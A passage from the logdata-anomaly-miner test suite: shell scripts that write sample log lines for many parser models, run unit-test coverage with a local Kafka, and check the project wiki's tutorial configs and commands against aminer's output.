T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML Completed" >> $LOGFILE echo "2014-09-10 13:06:55 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: \"SpamAssassin as cpaneleximscanner detected OUTGOING smtp message as NOT spam (-0.1)\"" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG <= bob@bob.com H=mail.fictional.example [10.5.40.204]:46793 P=esmtpsa X=TLSv1:AES128-SHA:128 A=dovecot_login:aaron@domain.com S=18635 T=\"14\\\" plates\" for live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG SMTP connection outbound 1410368816 1XRlM6-003yMv-KG domain.com live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:07:22 1XRlM6-003yMv-KG => live@somedomain.com R=dkim_lookuphost T=dkim_remote_smtp H=mail.fictional.example [10.5.40.204] X=TLSv1:DHE-RSA-AES256-SHA:256 C=\"250 OK id=1XRlMC-0006w5-F4\" 2014-09-10 13:07:22 1XRlM6-003yMv-KG Completed" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: \"SpamAssassin as sfgthib detected message as spam (998.0)\" 2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR <= cpaneltest@gmail.com H=mail.fictional.example [10.5.40.204]:42603 P=esmtps X=TLSv1:RC4-SHA:128 S=3411 id=CAPtYmmQYRDb38yTmnA_ULZVjnKVOdtu6yw-HapGmjBCAk6rYYw@mail.gmail.com T=\"test\" for aaron@domain.com" >> $LOGFILE ;; KernelMsgParsingModel) echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" > $LOGFILE echo "kernel: martian source 192.168.1.255 from 192.168.1.251, on dev eth3" >> $LOGFILE echo "kernel: ll header: ff:ff:ff:ff:ff:ff:00:18:f8:0e:81:93:08:00" >> $LOGFILE echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff 00 50 56 ad 59 09 08 00 .......PV.Y..." >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff a6 2c 90 bb 31 e9 08 06 .......,..1..." >> $LOGFILE ;; NtpParsingModel) echo "ntpd[8457]: Listen and drop on 0 v6wildcard [::]:123" > $LOGFILE echo "ntpd[8457]: Listen and drop on 1 v4wildcard 0.0.0.0:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 2 lo 127.0.0.1:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 3 eth0 1.2.2.19:123" >> $LOGFILE echo "ntpd[8457]: Listening on routing socket on fd #20 for interface updates" >> $LOGFILE echo "ntpd[21152]: logging to file /var/log/ntplog" >> $LOGFILE echo "ntpd[22760]: Soliciting pool server 78.41.116.113" >> $LOGFILE echo "ntpd[23165]: ntpd 4.2.8p12@1.3728-o (1): Starting" >> $LOGFILE echo "ntpd[23165]: Command line: ntpd" >> $LOGFILE echo "ntpd[23165]: must be run as root, not uid 1000" >> $LOGFILE echo "ntpd[23170]: proto: precision = 0.045 usec (-24)" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): good hash signature" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): loaded, expire=2021-12-28T00:00:00Z last=2017-01-01T00:00:00Z ofs=37" >> $LOGFILE echo "ntpd[23170]: unable to bind to wildcard address :: - another process may be running - EXITING" >> $LOGFILE ;; RsyslogParsingModel) echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.4.2\" x-pid=\"1812\" x-info=\"http://www.rsyslog.com\"] rsyslogd was HUPed" > $LOGFILE echo "rsyslogd0: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/0 ]" >> $LOGFILE echo "rsyslogd-2359: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/2359 ]" >> $LOGFILE echo "rsyslogd-2007: action 'action 17' suspended, next retry is Sun May 24 06:56:28 2015 [try http://www.rsyslog.com/e/2007 ]" >> $LOGFILE echo "rsyslogd: rsyslogd's groupid changed to 109" >> $LOGFILE echo "rsyslogd: rsyslogd's userid changed to 104" >> $LOGFILE echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"28018\" x-info=\"https://www.rsyslog.com\"] start" >> $LOGFILE echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"542\" x-info=\"https://www.rsyslog.com\"] rsyslogd was HUPed" >> $LOGFILE echo "rsyslogd-2222: command 'KLogPermitNonKernelFacility' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? [v8.16.0 try http://www.rsyslog.com/e/2222 ]" >> $LOGFILE ;; SshdParsingModel) echo "sshd[35618]: Server listening on 0.0.0.0 port 22." > $LOGFILE echo "sshd[35619]: Failed password for someuser from 1.1.1.1 port 1372 ssh2" >> $LOGFILE echo "sshd[35619]: Accepted password for someuser from 1.1.1.1 port 1372 ssh2" >> $LOGFILE echo "sshd[36108]: Accepted publickey for someuser from 1.1.1.2 port 51590 ssh2" >> $LOGFILE echo "sshd[54798]: error: maximum authentication attempts exceeded for root from 122.121.51.193 port 59928 ssh2 [preauth]" >> $LOGFILE echo "sshd[54798]: Disconnecting authenticating user root 122.121.51.193 port 59928: Too many authentication failures [preauth]" >> $LOGFILE echo "sshd[5197]: Accepted publickey for fred from 192.0.2.60 port 59915 ssh2: RSA SHA256:5xyQ+PG1Z3CIiShclJ2iNya5TOdKDgE/HrOXr21IdOo" >> $LOGFILE echo "sshd[50140]: Accepted publickey for fred from 192.0.2.60 port 44456 ssh2: ECDSA-CERT SHA256:qGl9KiyXrG6mIOo1CT01oHUvod7Ngs5VMHM14DTbxzI ID foobar (serial 9624) CA ED25519 SHA256:fZ6L7TlBLqf1pGWzkcQMQMFZ+aGgrtYgRM90XO0gzZ8" >> $LOGFILE echo "sshd[5104]: Accepted publickey for fred from 192.0.2.60 port 60594 ssh2: RSA e8:31:68:c7:01:2d:25:20:36:8f:50:5d:f9:ee:70:4c" >> $LOGFILE echo "sshd[252]: Connection closed by authenticating user fred 192.0.2.60 port 44470 [preauth]" >> $LOGFILE echo "sshd[90593]: fatal: Timeout before authentication for 192.0.2.60 port 44718" >> $LOGFILE echo "sshd[252]: error: Certificate invalid: expired" >> $LOGFILE echo "sshd[90593]: error: Certificate invalid: not yet valid" >> $LOGFILE echo "sshd[98884]: error: Certificate invalid: name is not a listed principal" >> $LOGFILE echo "sshd[2420]: cert: Authentication tried for fred with valid certificate but not from a permitted source address (192.0.2.61)." >> $LOGFILE echo "sshd[2420]: error: Refused by certificate options" >> $LOGFILE echo "sshd[26299]: Failed none for fred from 192.0.2.60 port 47366 ssh2" >> $LOGFILE echo "sshd[26299]: User child is on pid 21613" >> $LOGFILE echo "sshd[21613]: Changed root directory to \"/home/fred\"" >> $LOGFILE echo "sshd[21613]: subsystem request for sftp" >> $LOGFILE echo "sshd[83709]: packet_write_poll: Connection from 192.0.2.97 port 57608: Host is down" >> $LOGFILE echo "sshd[9075]: debug1: Got 100/147 for keepalive" >> $LOGFILE echo "sshd[73960]: debug2: channel 0: request keepalive@openssh.com confirm 1" >> $LOGFILE echo "sshd[73960]: debug3: send packet: type 98" >> $LOGFILE echo "sshd[73960]: debug3: receive packet: type 100" >> $LOGFILE echo "sshd[73960]: debug1: Got 100/22 for keepalive" >> $LOGFILE echo "sshd[15780]: debug1: do_cleanup" >> $LOGFILE echo "sshd[48675]: debug1: session_pty_cleanup: session 0 release /dev/ttyp0" >> $LOGFILE echo "sshd[29235]: error: Authentication key RSA SHA256:jXEPmu4thnubqPUDcKDs31MOVLQJH6FfF1XSGT748jQ revoked by file /etc/ssh/ssh_revoked_keys" >> $LOGFILE echo "sshd[38594]: Invalid user ubnt from 201.179.249.231 port 52471" >> $LOGFILE echo "sshd[38594]: Failed password for invalid user ubnt from 201.179.249.231 port 52471 ssh2" >> $LOGFILE echo "sshd[38594]: error: maximum authentication attempts exceeded for invalid user ubnt from 201.179.249.231 port 52471 ssh2 [preauth]" >> $LOGFILE echo "sshd[38594]: Disconnecting invalid user ubnt 201.179.249.231 port 52471: Too many authentication failures [preauth]" >> $LOGFILE echo "sshd[93126]: Failed none for invalid user admin from 125.64.94.136 port 27586 ssh2" >> $LOGFILE echo "sshd[9265]: Accepted password for fred from 127.0.0.1 port 40426 ssh2" >> $LOGFILE echo "sshd[5613]: Invalid user cloud from ::1 port 57404" >> $LOGFILE echo "sshd[5613]: Failed password for invalid user cloud from ::1 port 57404 ssh2" >> $LOGFILE echo "sshd[5613]: Connection closed by invalid user cloud ::1 port 57404 [preauth]" >> $LOGFILE echo "sshd[3545]: pam_succeed_if(sshd:auth): requirement \"uid >= 1000\" not met by user \"root\"" >> $LOGFILE echo "sshd[3545]: pam_unix(sshd:session): session opened for user root by (uid=0)" >> $LOGFILE echo "sshd[3545]: Received disconnect from ::1: 11: disconnected by user" >> $LOGFILE echo "sshd[3545]: pam_unix(sshd:session): session closed for user root" >> $LOGFILE echo "sshd[4182]: error: Could not load host key: /etc/ssh/ssh_host_dsa_key" >> $LOGFILE ;; SsmtpParsingModel) echo "sSMTP[24391]: /usr/sbin/sendmail sent mail for raul" > $LOGFILE ;; SuSessionParsingModel) echo "su[10710]: Successful su for user by root" > $LOGFILE echo "su[10710]: + ??? root:user" >> $LOGFILE echo "su[10710]: pam_unix(su:session): session opened for user user by (uid=0)" >> $LOGFILE echo "su[10710]: pam_unix(su:session): session closed for user user" >> $LOGFILE ;; SyslogPreambleModel) echo "Feb 29 00:01:41 mail-0 " > $LOGFILE echo "Mar 1 06:25:38 mail " >> $LOGFILE ;; SystemdParsingModel) echo "systemd[1]: phpsessionclean.service: Succeeded." > $LOGFILE echo "systemd[1]: Finished Clean php session files." >> $LOGFILE echo "systemd[1]: logrotate.service: Succeeded." >> $LOGFILE echo "systemd[1]: Finished Rotate log files." >> $LOGFILE echo "systemd[1]: man-db.service: Succeeded." >> $LOGFILE echo "systemd[1]: Finished Daily man-db regeneration." >> $LOGFILE echo "systemd[1]: Finished Ubuntu Advantage APT and MOTD Messages." >> $LOGFILE echo "systemd[1]: Finished Refresh fwupd metadata and update motd." >> $LOGFILE echo "systemd[1]: Finished Daily apt download activities." >> $LOGFILE echo "systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "systemd[1]: Finished Daily apt upgrade and clean activities." >> $LOGFILE echo "systemd[1]: anacron.service: Killing process 39123 (update-notifier) with signal SIGKILL." >> $LOGFILE echo "systemd[1]: Starting PackageKit Daemon..." >> $LOGFILE echo "systemd[1]: Started PackageKit Daemon." >> $LOGFILE echo "systemd[1]: Reloading." >> $LOGFILE echo "systemd[2318]: var-lib-docker-overlay2-check\x2doverlayfs\x2dsupport037009939-merged.mount: Succeeded." >> $LOGFILE echo "systemd[2318]: Started VTE child process 54668 launched by gnome-terminal-server process 2984." >> $LOGFILE echo "systemd-logind[2445]: New session 2172664 of user dbi_backup." >> $LOGFILE echo "systemd-logind[760]: Session 230 logged out. Waiting for processes to exit." >> $LOGFILE echo "systemd-logind[760]: Removed session 230." >> $LOGFILE echo "systemd-logind[760]: New session 231 of user egoebelbecker." >> $LOGFILE echo "systemd-logind[467]: Failed to abandon session scope: Transport endpoint is not connected" >> $LOGFILE ;; TomcatParsingModel) # model is not updated to the latest version and therefore not tested. rm $LOGFILE touch $LOGFILE ;; UlogdParsingModel) echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"52\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK FIN\"" > $LOGFILE echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******xx\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"153\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK PSH FIN\"" >> $LOGFILE ;; DnsParsingModel) echo "Jan 20 11:21:42 dnsmasq[3326]: started, version 2.79 cachesize 150" echo "Jan 20 11:21:42 dnsmasq[3326]: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth nettlehash DNSSEC loop-detect inotify" echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 8.8.8.8#53" echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 192.168.230.122#53 for domain email-19.kennedy-mendoza.info" echo "Jan 20 11:21:42 dnsmasq[3326]: read /etc/hosts - 7 addresses" echo "Jan 20 11:21:55 dnsmasq[3414]: query[SRV] _http._tcp.archive.ubuntu.com from 192.168.230.4" echo "Jan 20 11:21:55 dnsmasq[3414]: forwarded _http._tcp.archive.ubuntu.com to 8.8.8.8" echo "Jan 20 11:21:55 dnsmasq[3414]: reply archive.ubuntu.com is 91.189.88.152" echo "Jan 20 11:23:40 dnsmasq[3326]: cached debian.map.fastlydns.net is 199.232.138.132" echo "Jan 20 11:21:42 inet-dns dnsmasq[1969]: exiting on receipt of SIGTERM" echo "Jan 20 13:47:14 dnsmasq[3326]: nameserver 127.0.0.1 refused to do a recursive query" echo "Jan 21 07:05:20 dnsmasq[3468]: failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory" echo "Jan 24 03:56:53 dnsmasq[15084]: config version.bind is " ;; OpenVpnParsingModel) echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 TLS: soft reset sec=3308/3308 bytes=45748/-1 pkts=649/0" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY OK: depth=1, C=AT, ST=Vienna, L=Vienna, O=Some Organisation GmbH, CN=OpenVPN CA, emailAddress=admin@organisation.cyberrange.at" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY KU OK" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Validating certificate extended key usage" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_VER=2.4.4" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PLAT=linux" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PROTO=2" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_LZ4=1" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_COMP_STUB=1" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_TCPNL=1" echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key" echo "2022-01-21 03:49:44 jhall/192.168.230.165:46011 TLS: soft reset sec=3309/3308 bytes=45892/-1 pkts=651/0" echo "2022-01-21 06:30:01 192.168.230.95:60795 TLS: Initial packet from [AF_INET]192.168.230.95:60795, sid=30d47335 8140d551" echo "2022-01-21 06:30:01 192.168.230.95:60795 peer info: IV_NCP=2" echo "2022-01-21 06:30:01 192.168.230.95:60795 [twhite] Peer Connection Initiated with [AF_INET]192.168.230.95:60795" echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI_sva: pool returned IPv4=10.9.0.6, IPv6=(Not enabled)" echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: Learn: 10.9.0.6 -> twhite/192.168.230.95:60795" echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: primary virtual IP for twhite/192.168.230.95:60795: 10.9.0.6" echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 PUSH: Received control message: 'PUSH_REQUEST'" echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 SENT CONTROL [twhite]: 'PUSH_REPLY,redirect-gateway def1,block-outside-dns,route 10.9.0.1,topology net30,ping 10,ping-restart 120,ifconfig 10.9.0.6 10.9.0.5,peer-id 0,cipher AES-256-CBC' (status=1)" echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 [jhall] Inactivity timeout (--ping-restart), restarting" echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 SIGUSR1[soft,ping-restart] received, client-instance restarting" echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)" echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS handshake failed" echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS: move_session: dest=TM_LAME_DUCK src=TM_ACTIVE reinit_src=1" ;; *) echo "Unknown parser config '$BN' was found! Please extend these tests. Failing.." exit_code=2 continue ;; esac cat >> $CONFIG_PATH < $OUT 2>&1 exit_code=$? if [[ `grep -ic "VerboseUnparsedAtomHandler" $OUT` != 0 && $BN != "AminerParsingModel" ]] || [[ `grep -o '\bVerboseUnparsedAtomHandler\b' $OUT | wc -l` > 5 ]] || `grep -Fq "Traceback" $OUT` || `grep -Fq "{'Parser'" $OUT` || `grep -Fq "FATAL" $OUT` || `grep -Fq "Config-Error" $OUT`; then echo "Failed Test in $filename" exit_code=1 cat $OUT echo echo fi done rm $CONFIG_PATH exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runCoverageTests.sh000077500000000000000000000022351437606560100246510ustar00rootroot00000000000000source config curl $KAFKA_URL --output kafka.tgz tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 1 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sudo coverage run --source=./aminer -m unittest discover -s unit -p '*Test.py' > /dev/null exit_code1=$? touch /tmp/report echo 'Statement Coverage:' > /tmp/report sudo coverage report >> /tmp/report sudo coverage run --source=./aminer --branch -m unittest discover -s unit -p '*Test.py' > /dev/null exit_code2=$? echo 'Branch Coverage:' >> /tmp/report sudo coverage report >> /tmp/report cat /tmp/report rm /tmp/report test -e /var/mail/mail && sudo rm -f /var/mail/mail sudo rm /tmp/test4unixSocket.sock sudo rm /tmp/test5unixSocket.sock sudo rm /tmp/test6unixSocket.sock $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs if [[ "$exit_code1" -ne 0 || "$exit_code2" -ne 0 ]]; then exit 1 fi exit 0 logdata-anomaly-miner-2.6.1/aecid-testsuite/runElasticSearchWikiTest.sh000077500000000000000000000050401437606560100262660ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write second line of 3rd to 4th ``` into LOG. # 2.) Write the config to CFG_PATH from 1st ```yaml to 5th ```. # 3.) Replace LogResourceList path with LOG in CFG_PATH and the report interval of the ParserCount. # 4.) Extract the CMD between 10th and 11th ``` # 5.) Compare the results with the outputs between between 12th and 13th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT=logdata-anomaly-miner.wiki/Importing-logs-via-ElasticSearch-interface.md OUT=/tmp/out.txt LOG=/tmp/access.log CFG_PATH=/etc/aminer/config.yml TMPFILE1=/tmp/tmpfile1 TMPFILE2=/tmp/tmpfile2 # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. exit_code=0 # write log data into file (1.) awk '/^```$/ && ++n == 3, /^```$/ && n++ == 4' < $INPUT | sed '/^```/ d' > $LOG sed -i '1d' $LOG # write the config to CFG_PATH (2.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (3.) sed "s?unix:///var/lib/aelastic/aminer.sock?file:///${LOG}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # extract CMD (4.) awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (5.) IN=$(awk '/^```$/ && ++n == 12, /^```$/ && n++ == 13' < $INPUT | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE2 fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then cat $TMPFILE1 echo echo "Failed Test in 5." echo cat $TMPFILE2 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 rm $OUT rm $LOG sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runGettingStarted.sh000077500000000000000000000165171437606560100250330ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the first log line between the 4th and 5th ``` in the third line and save it to /var/log/apache2/access.log # 2.) Link the ApacheAccessLog by running the command between the 5th ```bash and 7th ``` after "$ ". # 3.) Extract the first aminer command and the CFG_PATH between 9th and 10th ```. # 4.) Write the config to CFG_PATH from 1st ```yaml to 8th ```. # 5.) Extract the resulting outputs between 9th and 10th ``` by comparing following lines with the ones from the output: # - 6,34 with 2,30 # - 37,39 with 37,39 # 6.) Compare the outputs between 9th and 10th ``` and the outputs between 19th and 20th ```. # 7.) Write the config to CFG_PATH from 2nd ```yaml to 11th ```. # 8.) Read 1st ```python to 14th ``` and compare the ApacheAccessModel with the ApacheAccessModel in source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py # 9.) Write new lines to the access.log from the 4th and 5th line between 21st and 22nd ```. # 10.) Read the new command without clearing the persisted data from the 2nd line between 23rd and 24th ```. Run the command and compare the lines 4,32 with the output lines 2,30. # 11.) Read all log lines between the 27th and 28th ``` and save it to /var/log/apache2/access.log # 12.) Extract the resulting outputs and CFG_PATH (1st line) between 30th and 31st ``` by comparing following lines with the ones from the output: # - 4,32 with 2,30 # - 35,37 with 33,35 # - 40,42 with 38,40 # - 45,47 with 43,45 # - 50,52 with 48,50 # - 55,57 with 53,55 # - 60,62 with 58,60 # 13.) Write the config to CFG_PATH from 5th ```yaml to 29th ```. # 14.) Set LearnMode to False. # 15.) Parse the last CMD between 34th and 35th ```. # 16.) Append the new logline and extract the resulting outputs between 40th and 41st ``` by comparing following lines with the ones from the output: # - 4,6 with 2,4 ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md OUT=/tmp/out.txt OUT2=/tmp/out2.txt LOG=/tmp/access.log # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sed -i "s?/var/log/apache2/access.log?/tmp/access.log?g" $INPUT_FILE # create log file (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE > $LOG sed -i -n '3p' $LOG # link the ApacheAccessModel (2.) awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } $CMD 2> /dev/null # load the aminer command. (3.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '4p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} # write the yaml config. (4.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # extract resulting outputs and compare them. (5.) OUT1=$(sed -n '6,34p' < $OUT) OUT2=$(sed -n '37,39p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,37p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 5." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 5." exit_code=$((exit_code | $?)) # compare the outputs (6.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT OUT1=$(sed -n '5,$p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE > $OUT OUT2=$(sed -n '2,$p' < $OUT) compareStrings "$OUT1" "$OUT2" "Failed Test in 6." exit_code=$((exit_code | $?)) # write the second yaml config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # compare ApacheAccessModel (8.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # write new loglines. (9.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $LOG OUT1=$(sed -n '4,5p' < $LOG) echo "$OUT1" > $LOG # read new command (10.) awk '/^```$/ && ++n == 23, /^```$/ && n++ == 24' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 10." exit_code=$((exit_code | $?)) # rewrite access.log (11.) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $LOG # extract resulting outputs and CFG_PATH and compare them. (12.) awk '/^```$/ && ++n == 30, /^```$/ && n++ == 31' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} OUT1=$(sed -n '4,32p' < $OUT) OUT2=$(sed -n '35,37p' < $OUT) OUT3=$(sed -n '40,42p' < $OUT) OUT4=$(sed -n '45,47p' < $OUT) OUT5=$(sed -n '50,52p' < $OUT) OUT6=$(sed -n '55,57p' < $OUT) OUT7=$(sed -n '60,62p' < $OUT) # test the fifth yaml config. (13.) awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,35p' < $OUT) IN3=$(sed -n '38,40p' < $OUT) IN4=$(sed -n '43,45p' < $OUT) IN5=$(sed -n '48,50p' < $OUT) IN6=$(sed -n '53,55p' < $OUT) IN7=$(sed -n '58,60p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT3" "$IN3" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT4" "$IN4" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT5" "$IN5" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT6" "$IN6" "Failed Test in 13." exit_code=$((exit_code | $?)) compareStrings "$OUT7" "$IN7" "Failed Test in 13." exit_code=$((exit_code | $?)) # set LearnModel to False. (14.) sudo sed -i 's/LearnMode: True/LearnMode: False/g' $CFG_PATH # 